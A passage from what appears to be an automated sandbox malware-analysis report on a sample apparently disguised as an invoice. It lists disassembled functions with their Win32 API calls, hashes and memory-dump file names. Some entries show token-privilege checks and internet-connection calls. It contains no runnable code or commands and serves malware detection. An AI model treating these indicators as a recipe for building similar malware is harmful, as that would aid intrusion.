                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                          • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                                          • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                                          • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                                          Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • GetCursorPos.USER32(?), ref: 0048C4D2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                                          • GetCursorPos.USER32(?), ref: 0048C534
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                          • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                                          • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                                          • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                                          Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                            • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                            • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                            • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                            • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                                          • _memcmp.LIBCMT ref: 004586C6
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                                          • HeapFree.KERNEL32(00000000), ref: 00458703
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                          • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                                          • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                                          • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                                          Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • __setmode.LIBCMT ref: 004209AE
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                          • _fprintf.LIBCMT ref: 004209E5
                                          • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                                            • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                                          • __setmode.LIBCMT ref: 00420A1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                          • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                                          • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                                          • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                                          Function 00471767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                                            • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                            • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Internet$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 1463438336-0
                                          • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                          • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                                          • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                          • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                                          Function 004350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00435101
                                            • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                            • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                            • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C50000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                          • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                          • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                          • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                          Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                            • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                          • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                          • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                          • _memmove.LIBCMT ref: 004763D1
                                          • inet_ntoa.WSOCK32(?), ref: 004763DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 1504782959-0
                                          • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                          • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                          • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                          • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                          Function 00458B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                          • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                          • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                          • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                          Function 00401290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                          • GetClientRect.USER32(?,?), ref: 0043B5FB
                                          • GetCursorPos.USER32(?), ref: 0043B605
                                          • ScreenToClient.USER32(?,?), ref: 0043B610
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Client$CursorLongProcRectScreenWindow
                                          • String ID:
                                          • API String ID: 4127811313-0
                                          • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                          • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                          • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                          • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                          Function 0045D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Type$Register$FileLoadModuleNameUser
                                          • String ID:
                                          • API String ID: 1352324309-0
                                          • Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                          • Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
                                          • Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                          • Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5
                                          Function 00436FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                          Function 0048B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                          • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                          • ScreenToClient.USER32(?,?), ref: 0048B320
                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ClientRectScreen$InvalidateWindow
                                          • String ID:
                                          • API String ID: 357397906-0
                                          • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                          • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                          • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                          • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                          Function 00466BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                            • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                          • _memmove.LIBCMT ref: 00466C09
                                          • _memset.LIBCMT ref: 00466C16
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                          • String ID:
                                          • API String ID: 48991266-0
                                          • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                          • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                          • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                          • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                          Function 00402218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00402231
                                          • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00402250
                                          • GetStockObject.GDI32(00000005), ref: 00402258
                                          • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                          • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                          • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                          • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                          • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                          • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                          Function 00458712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                          Download Yara Rule
                                          APIs
